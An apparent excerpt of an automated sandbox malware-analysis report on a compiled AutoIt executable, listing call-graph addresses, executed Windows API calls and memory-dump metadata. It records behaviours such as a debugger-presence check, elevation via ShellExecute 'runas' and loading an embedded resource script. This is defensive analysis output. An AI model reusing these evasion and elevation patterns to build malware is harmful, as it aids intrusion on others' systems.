7ff656cfbabc 95759->95761 95762 7ff656cb3f6c 96254 7ff656cb6394 95762->96254 95765 7ff656cb3fb6 wcsftime 95764->95765 96297 7ff656cb9734 95765->96297 95767 7ff656cb3fc4 95768 7ff656cb4050 95767->95768 96307 7ff656cb4d28 77 API calls 95767->96307 95768->95640 95770 7ff656cb3fd3 95770->95768 96308 7ff656cb4b0c 79 API calls Concurrency::wait 95770->96308 95772 7ff656cb3fe0 95772->95768 95773 7ff656cb3fe8 GetFullPathNameW 95772->95773 95774 7ff656cb7cf4 4 API calls 95773->95774 95775 7ff656cb4014 95774->95775 95776 7ff656cb7cf4 4 API calls 95775->95776 95777 7ff656cb4028 95776->95777 95778 7ff656cfbac2 wcscat 95777->95778 95779 7ff656cb7cf4 4 API calls 95777->95779 95779->95768 96312 7ff656cb3d90 7 API calls 95780->96312 95782 7ff656cb38d5 95783 7ff656cb3cbc CreateWindowExW CreateWindowExW ShowWindow ShowWindow 95782->95783 95784->95640 95785->95648 95786->95662 95788 7ff656cb9be5 wcsftime 95787->95788 95789 7ff656cb7cf4 4 API calls 95788->95789 95791 7ff656cb9c1b 95788->95791 95789->95791 95799 7ff656cb9c4a Concurrency::wait 95791->95799 95898 7ff656cb9d84 95791->95898 95792 7ff656cbec00 4 API calls 95793 7ff656cb9d4a 95792->95793 95795 7ff656cb4680 4 API calls 95793->95795 95794 7ff656cbec00 4 API calls 95794->95799 95797 7ff656cb9d57 Concurrency::wait 95795->95797 95796 7ff656cb9d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95796->95799 95797->95678 95798 7ff656cb4680 4 API calls 95798->95799 95799->95794 95799->95796 95799->95798 95800 7ff656cb9d21 95799->95800 95800->95792 95800->95797 95901 7ff656cb6d64 95801->95901 95804 7ff656cb649d 95805 7ff656cb64c0 95804->95805 95806 7ff656cb64ba FreeLibrary 95804->95806 95905 7ff656ce48e0 95805->95905 95806->95805 95807 7ff656cb6d64 2 API calls 95807->95804 95810 7ff656cfc8f6 95812 7ff656cb652c 63 API calls 95810->95812 95811 7ff656cb64db LoadLibraryExW 95924 7ff656cb6cc4 95811->95924 95814 7ff656cfc8fe 95812->95814 95816 7ff656cb6cc4 3 API calls 95814->95816 95818 7ff656cfc907 95816->95818 95946 7ff656cb67d8 95818->95946 95819 7ff656cb6505 95819->95818 95820 7ff656cb6512 95819->95820 95822 7ff656cb652c 63 API calls 95820->95822 95824 7ff656cb5846 95822->95824 95824->95685 95824->95686 95826 7ff656cfc93f 96149 7ff656cc1a30 95827->96149 95829 7ff656cbf029 95830 7ff656d0a7a8 95829->95830 95831 7ff656cbf040 95829->95831 96165 7ff656cbee20 5 API calls Concurrency::wait 95830->96165 95834 7ff656cd4c68 4 API calls 95831->95834 95833 7ff656d0a7bc 95835 7ff656cbf066 95834->95835 95837 7ff656cbf08f 95835->95837 96164 7ff656cbf0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95835->96164 96160 7ff656cbf1bc 95837->96160 95839 7ff656cbf0c6 95839->95697 95841 7ff656cb5ae4 95840->95841 95842 7ff656cb5ac6 95840->95842 95843 7ff656cb7cf4 4 API calls 95841->95843 95844 7ff656cbe0a8 4 API calls 95842->95844 95845 7ff656cb592d 95843->95845 95844->95845 95846 7ff656cd8e28 95845->95846 95847 7ff656cd8ea4 95846->95847 95848 7ff656cd8e3f 95846->95848 96169 7ff656cd8d98 35 API calls _mbstowcs_s_l 95847->96169 95857 7ff656cd8e63 95848->95857 96167 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 95848->96167 95851 7ff656cd8ed6 95853 7ff656cd8ee2 95851->95853 95858 7ff656cd8ef9 95851->95858 95852 7ff656cd8e49 96168 7ff656ceb164 31 API calls _invalid_parameter_noinfo 95852->96168 96170 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 95853->96170 95856 7ff656cd8e54 95856->95715 95857->95715 95860 7ff656cd8ef2 95858->95860 95862 7ff656ce2c80 37 API calls wcsftime 95858->95862 95859 7ff656cd8ee7 96171 7ff656ceb164 31 API calls _invalid_parameter_noinfo 95859->96171 95860->95715 95862->95858 95865 7ff656cbdfac 95863->95865 95864 7ff656cd4c68 4 API calls 95866 7ff656cb59f5 95864->95866 95865->95864 95865->95866 95867 7ff656cbd670 95866->95867 95868 7ff656cbd698 95867->95868 95872 7ff656cbd6a2 95868->95872 96172 7ff656cb880c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95868->96172 95871 7ff656d09d43 95873 7ff656cbd7de 95872->95873 96173 7ff656cbee20 5 API calls Concurrency::wait 95872->96173 95873->95745 95875 7ff656d329c8 95874->95875 96174 7ff656d32b70 95875->96174 95878 7ff656cb67d8 45 API calls 95879 7ff656d32a03 95878->95879 95880 7ff656cb67d8 45 API calls 95879->95880 95881 7ff656d32a23 95880->95881 95882 7ff656cb67d8 45 API calls 95881->95882 95883 7ff656d32a49 95882->95883 95884 7ff656cb67d8 45 API calls 95883->95884 95885 7ff656d32a6d 95884->95885 95886 7ff656cb67d8 45 API calls 95885->95886 95887 7ff656d32ac5 95886->95887 95888 7ff656d3240c 32 API calls 95887->95888 95889 7ff656d32ada 95888->95889 95891 7ff656d329de 95889->95891 96179 7ff656d31d48 95889->96179 95891->95688 95893 7ff656cb6542 95892->95893 95894 7ff656cb653d 95892->95894 95896 7ff656cb656f FreeLibrary 95893->95896 95897 7ff656cb6558 95893->95897 95895 7ff656ce4970 62 API calls 95894->95895 95895->95893 95896->95897 95897->95699 95899 7ff656cba7c0 4 API calls 95898->95899 95900 7ff656cb9d99 95899->95900 95900->95791 95902 7ff656cb6d74 LoadLibraryA 95901->95902 95903 7ff656cb6490 95901->95903 95902->95903 95904 7ff656cb6d89 GetProcAddress 95902->95904 95903->95804 95903->95807 95904->95903 95906 7ff656ce47fc 95905->95906 95907 7ff656ce482a 95906->95907 95910 7ff656ce485c 95906->95910 95966 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 95907->95966 95909 7ff656ce482f 95967 7ff656ceb164 31 API calls _invalid_parameter_noinfo 95909->95967 95912 7ff656ce4862 95910->95912 95913 7ff656ce486f 95910->95913 95968 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 95912->95968 95954 7ff656cefeb4 95913->95954 95916 7ff656cb64cf 95916->95810 95916->95811 95918 7ff656ce4883 95969 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 95918->95969 95919 7ff656ce4890 95961 7ff656cf0304 95919->95961 95922 7ff656ce48a3 95970 7ff656cddf60 LeaveCriticalSection 95922->95970 96108 7ff656cb6d1c 95924->96108 95927 7ff656cb6cf1 95929 7ff656cb6d0f FreeLibrary 95927->95929 95930 7ff656cb64f7 95927->95930 95928 7ff656cb6d1c 2 API calls 95928->95927 95929->95930 95931 7ff656cb6580 95930->95931 95932 7ff656cd4c68 4 API calls 95931->95932 95933 7ff656cb65b5 memcpy_s 95932->95933 95934 7ff656cfc9f5 95933->95934 95935 7ff656cb6740 CreateStreamOnHGlobal 95933->95935 95945 7ff656cb6602 95933->95945 96112 7ff656d32e00 45 API calls 95934->96112 95937 7ff656cb6759 FindResourceExW 95935->95937 95935->95945 95937->95945 95938 7ff656cfc97e LoadResource 95940 7ff656cfc997 SizeofResource 95938->95940 95938->95945 95939 7ff656cb67d8 45 API calls 95939->95945 95942 7ff656cfc9ae LockResource 95940->95942 95940->95945 95941 7ff656cfc9fd 95943 7ff656cb67d8 45 API calls 95941->95943 95942->95945 95944 7ff656cb66e8 95943->95944 95944->95819 95945->95938 95945->95939 95945->95941 95945->95944 95947 7ff656cfca6c 95946->95947 95948 7ff656cb67f7 95946->95948 96113 7ff656ce4c5c 95948->96113 95951 7ff656d3240c 96132 7ff656d32200 95951->96132 95953 7ff656d32430 95953->95826 95971 7ff656ceb9bc EnterCriticalSection 95954->95971 95956 7ff656cefecb 95957 7ff656ceff54 18 API calls 95956->95957 95958 7ff656cefed6 95957->95958 95959 7ff656ceba10 _isindst LeaveCriticalSection 95958->95959 95960 7ff656ce4879 95959->95960 95960->95918 95960->95919 95972 7ff656cf0040 95961->95972 95964 7ff656cf035e 95964->95922 95966->95909 95967->95916 95968->95916 95969->95916 95977 7ff656cf007d try_get_function 95972->95977 95974 7ff656cf02de 95991 7ff656ceb164 31 API calls _invalid_parameter_noinfo 95974->95991 95976 7ff656cf021a 95976->95964 95984 7ff656cf7738 95976->95984 95980 7ff656cf0211 95977->95980 95987 7ff656cddb68 37 API calls 4 library calls 95977->95987 95979 7ff656cf0277 95979->95980 95988 7ff656cddb68 37 API calls 4 library calls 95979->95988 95980->95976 95990 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 95980->95990 95982 7ff656cf029a 95982->95980 95989 7ff656cddb68 37 API calls 4 library calls 95982->95989 95992 7ff656cf6d04 95984->95992 95987->95979 95988->95982 95989->95980 95990->95974 95991->95976 95993 7ff656cf6d40 95992->95993 95994 7ff656cf6d28 95992->95994 95993->95994 95996 7ff656cf6d6d 95993->95996 96046 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 95994->96046 96003 7ff656cf7348 95996->96003 95997 7ff656cf6d2d 96047 7ff656ceb164 31 API calls _invalid_parameter_noinfo 95997->96047 96001 7ff656cf6d39 96001->95964 96049 7ff656cf7078 96003->96049 96006 7ff656cf73d3 96069 7ff656cee418 96006->96069 96007 7ff656cf73bc 96081 7ff656ce55b4 15 API calls _invalid_parameter_noinfo 96007->96081 96010 7ff656cf73c1 96082 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 96010->96082 96012 7ff656cf73df 96083 7ff656ce55b4 15 API calls _invalid_parameter_noinfo 96012->96083 96013 7ff656cf73f7 CreateFileW 96015 7ff656cf74eb GetFileType 96013->96015 96016 7ff656cf7469 96013->96016 96021 7ff656cf74f8 GetLastError 96015->96021 96022 7ff656cf7549 96015->96022 96019 7ff656cf74b8 GetLastError 96016->96019 96024 7ff656cf7478 CreateFileW 96016->96024 96018 7ff656cf73e4 96084 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 96018->96084 96085 7ff656ce5564 15 API calls 2 library calls 96019->96085 96020 7ff656cf6d95 96020->96001 96048 7ff656cee3f4 LeaveCriticalSection 96020->96048 96086 7ff656ce5564 15 API calls 2 library calls 96021->96086 96088 7ff656cee334 16 API calls 2 library calls 96022->96088 96024->96015 96024->96019 96027 7ff656cf7507 CloseHandle 96027->96010 96029 7ff656cf7539 96027->96029 96087 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 96029->96087 96031 7ff656cf7568 96033 7ff656cf75b5 96031->96033 96089 7ff656cf7284 67 API calls 2 library calls 96031->96089 96032 7ff656cf753e 96032->96010 96038 7ff656cf75ec 96033->96038 96090 7ff656cf6de4 67 API calls 4 library calls 96033->96090 96036 7ff656cf75e8 96037 7ff656cf75fe 96036->96037 96036->96038 96037->96020 96040 7ff656cf7681 CloseHandle CreateFileW 96037->96040 96091 7ff656cf04b8 96038->96091 96041 7ff656cf76f9 96040->96041 96042 7ff656cf76cb GetLastError 96040->96042 96041->96020 96106 7ff656ce5564 15 API calls 2 library calls 96042->96106 96044 7ff656cf76d8 96107 7ff656cee548 16 API calls 2 library calls 96044->96107 96046->95997 96047->96001 96050 7ff656cf70a4 96049->96050 96051 7ff656cf70be 96049->96051 96050->96051 96052 7ff656ce55d4 _set_errno_from_matherr 15 API calls 96050->96052 96055 7ff656cf713b 96051->96055 96060 7ff656ce55d4 _set_errno_from_matherr 15 API calls 96051->96060 96053 7ff656cf70b3 96052->96053 96054 7ff656ceb164 _invalid_parameter_noinfo 31 API calls 96053->96054 96054->96051 96056 7ff656cf718c 96055->96056 96058 7ff656ce55d4 _set_errno_from_matherr 15 API calls 96055->96058 96057 7ff656ce2554 31 API calls 96056->96057 96067 7ff656cf71ec 96056->96067 96059 7ff656cf71e8 96057->96059 96061 7ff656cf7181 96058->96061 96062 7ff656cf726b 96059->96062 96059->96067 96063 7ff656cf7130 96060->96063 96064 7ff656ceb164 _invalid_parameter_noinfo 31 API calls 96061->96064 96065 7ff656ceb184 _invalid_parameter_noinfo 16 API calls 96062->96065 96066 7ff656ceb164 _invalid_parameter_noinfo 31 API calls 96063->96066 96064->96056 96068 7ff656cf7280 96065->96068 96066->96055 96067->96006 96067->96007 96070 7ff656ceb9bc _isindst EnterCriticalSection 96069->96070 96078 7ff656cee43b 96070->96078 96071 7ff656cee487 96072 7ff656ceba10 _isindst LeaveCriticalSection 96071->96072 96074 7ff656cee52a 96072->96074 96073 7ff656cee464 96075 7ff656cee170 16 API calls 96073->96075 96074->96012 96074->96013 96076 7ff656cee469 96075->96076 96076->96071 96079 7ff656cee310 wprintf EnterCriticalSection 96076->96079 96077 7ff656cee4c2 EnterCriticalSection 96077->96071 96080 7ff656cee4d1 LeaveCriticalSection 96077->96080 96078->96071 96078->96073 96078->96077 96079->96071 96080->96078 96081->96010 96082->96020 96083->96018 96084->96010 96085->96010 96086->96027 96087->96032 96088->96031 96089->96033 96090->96036 96092 7ff656cee604 31 API calls 96091->96092 96093 7ff656cf04cc 96092->96093 96094 7ff656cf04d2 96093->96094 96096 7ff656cf050c 96093->96096 96099 7ff656cee604 31 API calls 96093->96099 96095 7ff656cee548 16 API calls 96094->96095 96098 7ff656cf0534 96095->96098 96096->96094 96097 7ff656cee604 31 API calls 96096->96097 96101 7ff656cf0518 CloseHandle 96097->96101 96102 7ff656cf0560 96098->96102 96105 7ff656ce5564 fread_s 15 API calls 96098->96105 96100 7ff656cf04ff 96099->96100 96103 7ff656cee604 31 API calls 96100->96103 96101->96094 96104 7ff656cf0525 GetLastError 96101->96104 96102->96020 96103->96096 96104->96094 96105->96102 96106->96044 96107->96041 96109 7ff656cb6ce3 96108->96109 96110 7ff656cb6d2c LoadLibraryA 96108->96110 96109->95927 96109->95928 96110->96109 96111 7ff656cb6d41 GetProcAddress 96110->96111 96111->96109 96112->95941 96116 7ff656ce4c7c 96113->96116 96117 7ff656cb680a 96116->96117 96118 7ff656ce4ca6 96116->96118 96117->95951 96118->96117 96119 7ff656ce4cb5 fread_s 96118->96119 96120 7ff656ce4cd7 96118->96120 96129 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 96119->96129 96131 7ff656cddf54 EnterCriticalSection 96120->96131 96125 7ff656ce4cca 96130 7ff656ceb164 31 API calls _invalid_parameter_noinfo 96125->96130 96129->96125 96130->96117 96135 7ff656ce47bc 96132->96135 96134 7ff656d32210 96134->95953 96138 7ff656ce4724 96135->96138 96139 7ff656ce4732 96138->96139 96140 7ff656ce4746 96138->96140 96146 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 96139->96146 96142 7ff656ce4742 96140->96142 96148 7ff656cebef8 6 API calls __crtLCMapStringW 96140->96148 96142->96134 96143 7ff656ce4737 96147 7ff656ceb164 31 API calls _invalid_parameter_noinfo 96143->96147 96146->96143 96147->96142 96148->96142 96150 7ff656cc1c5f 96149->96150 96151 7ff656cc1a48 96149->96151 96150->95829 96157 7ff656cc1a90 96151->96157 96166 7ff656cd5114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96151->96166 96157->95829 96161 7ff656cbf1ce 96160->96161 96163 7ff656cbf1d8 96160->96163 96162 7ff656cc1a30 45 API calls 96161->96162 96162->96163 96163->95839 96164->95837 96165->95833 96167->95852 96168->95856 96169->95851 96170->95859 96171->95860 96172->95872 96173->95871 96178 7ff656d32bae 96174->96178 96175 7ff656cb67d8 45 API calls 96175->96178 96176 7ff656d329da 96176->95878 96176->95891 96177 7ff656d3240c 32 API calls 96177->96178 96178->96175 96178->96176 96178->96177 96180 7ff656d31d61 96179->96180 96181 7ff656d31d71 96179->96181 96182 7ff656ce48e0 89 API calls 96180->96182 96183 7ff656d31dbf 96181->96183 96184 7ff656ce48e0 89 API calls 96181->96184 96185 7ff656d31d7a 96181->96185 96182->96181 96206 7ff656d32038 96183->96206 96186 7ff656d31d9e 96184->96186 96185->95891 96186->96183 96188 7ff656d31da7 96186->96188 96188->96185 96218 7ff656ce4970 96188->96218 96189 7ff656d31df5 96190 7ff656d31df9 96189->96190 96191 7ff656d31e1c 96189->96191 96193 7ff656d31e07 96190->96193 96194 7ff656ce4970 62 API calls 96190->96194 96196 7ff656d31e4a 96191->96196 96197 7ff656d31e2a 96191->96197 96193->96185 96195 7ff656ce4970 62 API calls 96193->96195 96194->96193 96195->96185 96210 7ff656d31e88 96196->96210 96199 7ff656d31e38 96197->96199 96200 7ff656ce4970 62 API calls 96197->96200 96199->96185 96201 7ff656ce4970 62 API calls 96199->96201 96200->96199 96201->96185 96202 7ff656d31e68 96202->96185 96205 7ff656ce4970 62 API calls 96202->96205 96203 7ff656d31e52 96203->96202 96204 7ff656ce4970 62 API calls 96203->96204 96204->96202 96205->96185 96207 7ff656d32069 96206->96207 96209 7ff656d32056 memcpy_s 96206->96209 96208 7ff656ce4c5c _fread_nolock 45 API calls 96207->96208 96208->96209 96209->96189 96211 7ff656d31fb0 96210->96211 96217 7ff656d31eaa 96210->96217 96214 7ff656d31fd3 96211->96214 96232 7ff656ce2a04 60 API calls 2 library calls 96211->96232 96213 7ff656d31bd0 45 API calls 96213->96217 96214->96203 96217->96211 96217->96213 96217->96214 96230 7ff656d31c9c 45 API calls 96217->96230 96231 7ff656d320cc 60 API calls 96217->96231 96219 7ff656ce49a3 96218->96219 96220 7ff656ce498e 96218->96220 96226 7ff656ce499e 96219->96226 96233 7ff656cddf54 EnterCriticalSection 96219->96233 96234 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 96220->96234 96222 7ff656ce4993 96235 7ff656ceb164 31 API calls _invalid_parameter_noinfo 96222->96235 96225 7ff656ce49b9 96227 7ff656ce48ec 60 API calls 96225->96227 96226->96185 96228 7ff656ce49c2 96227->96228 96229 7ff656cddf60 fread_s LeaveCriticalSection 96228->96229 96229->96226 96230->96217 96231->96217 96232->96214 96234->96222 96235->96226 96237 7ff656cf8f90 wcsftime 96236->96237 96238 7ff656cb3ec4 GetLongPathNameW 96237->96238 96239 7ff656cb7cf4 4 API calls 96238->96239 96240 7ff656cb3eed 96239->96240 96241 7ff656cb4074 96240->96241 96242 7ff656cb9640 4 API calls 96241->96242 96243 7ff656cb408e 96242->96243 96244 7ff656cb56d4 5 API calls 96243->96244 96245 7ff656cb409b 96244->96245 96246 7ff656cfbada 96245->96246 96247 7ff656cb40a7 96245->96247 96251 7ff656cfbb0f 96246->96251 96288 7ff656cd1ad0 CompareStringW 96246->96288 96249 7ff656cb4680 4 API calls 96247->96249 96250 7ff656cb40b5 96249->96250 96284 7ff656cb40e8 96250->96284 96253 7ff656cb40cb Concurrency::wait 96253->95762 96255 7ff656cb6460 105 API calls 96254->96255 96256 7ff656cb63e5 96255->96256 96257 7ff656cfc656 96256->96257 96258 7ff656cb6460 105 API calls 96256->96258 96259 7ff656d32948 90 API calls 96257->96259 96260 7ff656cb6400 96258->96260 96261 7ff656cfc66e 96259->96261 96260->96257 96262 7ff656cb6408 96260->96262 96263 7ff656cfc672 96261->96263 96264 7ff656cfc690 96261->96264 96266 7ff656cb6414 96262->96266 96267 7ff656cfc67b 96262->96267 96268 7ff656cb652c 63 API calls 96263->96268 96265 7ff656cd4c68 4 API calls 96264->96265 96274 7ff656cfc6dd Concurrency::wait 96265->96274 96289 7ff656cbe774 143 API calls Concurrency::wait 96266->96289 96290 7ff656d2c5c8 77 API calls wprintf 96267->96290 96268->96267 96271 7ff656cfc68a 96271->96264 96272 7ff656cb6438 96272->95756 96273 7ff656cfc895 96275 7ff656cb652c 63 API calls 96273->96275 96274->96273 96277 7ff656cfc8a9 96274->96277 96281 7ff656cbec00 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96274->96281 96291 7ff656d27400 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 96274->96291 96292 7ff656d2730c 39 API calls 96274->96292 96293 7ff656d30210 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96274->96293 96294 7ff656cbb26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 96274->96294 96295 7ff656cb9940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96274->96295 96275->96277 96277->96273 96296 7ff656d276d8 77 API calls 3 library calls 96277->96296 96281->96274 96285 7ff656cb4107 96284->96285 96286 7ff656cb4130 memcpy_s 96284->96286 96287 7ff656cd4c68 4 API calls 96285->96287 96286->96253 96287->96286 96288->96246 96289->96272 96290->96271 96291->96274 96292->96274 96293->96274 96294->96274 96295->96274 96296->96277 96298 7ff656cb9762 96297->96298 96302 7ff656cb988d 96297->96302 96299 7ff656cd4c68 4 API calls 96298->96299 96298->96302 96301 7ff656cb9791 96299->96301 96300 7ff656cd4c68 4 API calls 96306 7ff656cb981c 96300->96306 96301->96300 96302->95767 96306->96302 96309 7ff656cbabe0 81 API calls 2 library calls 96306->96309 96310 7ff656cb9940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96306->96310 96311 7ff656cbb26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 96306->96311 96307->95770 96308->95772 96309->96306 96310->96306 96311->96306 96312->95782

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    Function 00007FF656CB37B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 145windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CB37F2
                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CB3807
                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CB388D
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB3F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF656CB38BF,?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CB3FFD
                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CB3924
                                                                                                                                                                                                                    • MessageBoxA.USER32 ref: 00007FF656CFB888
                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CFB8E1
                                                                                                                                                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CFB968
                                                                                                                                                                                                                    • ShellExecuteW.SHELL32 ref: 00007FF656CFB98F
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB3B84: GetSysColorBrush.USER32 ref: 00007FF656CB3B9E
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB3B84: LoadCursorW.USER32 ref: 00007FF656CB3BAE
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB3B84: LoadIconW.USER32 ref: 00007FF656CB3BC3
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB3B84: LoadIconW.USER32 ref: 00007FF656CB3BDC
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB3B84: LoadIconW.USER32 ref: 00007FF656CB3BF5
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB3B84: LoadImageW.USER32 ref: 00007FF656CB3C21
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB3B84: RegisterClassExW.USER32 ref: 00007FF656CB3C85
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB3CBC: CreateWindowExW.USER32 ref: 00007FF656CB3D0C
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB3CBC: CreateWindowExW.USER32 ref: 00007FF656CB3D5F
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB3CBC: ShowWindow.USER32 ref: 00007FF656CB3D75
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB6258: Shell_NotifyIconW.SHELL32 ref: 00007FF656CB6350
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                                                                                                                                                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                                                                                                                                                    • API String ID: 1593035822-3287110873
                                                                                                                                                                                                                    • Opcode ID: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                                                                                                                                                                                    • Instruction ID: dc8fda2a323fa5bed7ddb32e7f0a3c314144648a0ae90f4094809ce139e1f80e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92716BB1E1CA8395FA20AB20E8401F96770BF55348F8C1B36D54DE66B6DF6EE649C300
                                                                                                                                                                                                                    Function 00007FF656CB6580 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 208COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 352 7ff656cb6580-7ff656cb65fc call 7ff656cd4c68 call 7ff656cb6c98 call 7ff656cd5d00 359 7ff656cb6602-7ff656cb6606 352->359 360 7ff656cb6737-7ff656cb673a 352->360 363 7ff656cfca03-7ff656cfca1e 359->363 364 7ff656cb660c-7ff656cb6617 call 7ff656ce5514 359->364 361 7ff656cfc9f5-7ff656cfc9fd call 7ff656d32e00 360->361 362 7ff656cb6740-7ff656cb6753 CreateStreamOnHGlobal 360->362 361->363 362->359 366 7ff656cb6759-7ff656cb6777 FindResourceExW 362->366 375 7ff656cfca27-7ff656cfca60 call 7ff656cb6810 call 7ff656cb67d8 363->375 372 7ff656cb661b-7ff656cb664e call 7ff656cb67d8 364->372 366->359 370 7ff656cb677d 366->370 373 7ff656cfc97e-7ff656cfc991 LoadResource 370->373 380 7ff656cb6654-7ff656cb665f 372->380 381 7ff656cb66e8 372->381 373->359 376 7ff656cfc997-7ff656cfc9a8 SizeofResource 373->376 384 7ff656cb66ee 375->384 397 7ff656cfca66 375->397 376->359 379 7ff656cfc9ae-7ff656cfc9ba LockResource 376->379 379->359 383 7ff656cfc9c0-7ff656cfc9f0 379->383 385 7ff656cb6661-7ff656cb666f 380->385 386 7ff656cb66ae-7ff656cb66b2 380->386 381->384 383->359 388 7ff656cb66f1-7ff656cb6715 384->388 389 7ff656cb6670-7ff656cb667d 385->389 386->381 390 7ff656cb66b4-7ff656cb66cf call 7ff656cb6810 386->390 393 7ff656cb6729-7ff656cb6736 388->393 394 7ff656cb6717-7ff656cb6724 call 7ff656cd4c24 * 2 388->394 395 7ff656cb6680-7ff656cb668f 389->395 390->372 394->393 399 7ff656cb6691-7ff656cb6695 395->399 400 7ff656cb66d4-7ff656cb66dd 395->400 397->388 399->375 404 7ff656cb669b-7ff656cb66a8 399->404 405 7ff656cb6782-7ff656cb678c 400->405 406 7ff656cb66e3-7ff656cb66e6 400->406 404->389 408 7ff656cb66aa 404->408 409 7ff656cb678e 405->409 410 7ff656cb6797-7ff656cb67a1 405->410 406->399 408->386 409->410 411 7ff656cb67ce 410->411 412 7ff656cb67a3-7ff656cb67ad 410->412 411->373 413 7ff656cb67af-7ff656cb67bb 412->413 414 7ff656cb67c6 412->414 413->395 415 7ff656cb67c1 413->415 414->411 415->414
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
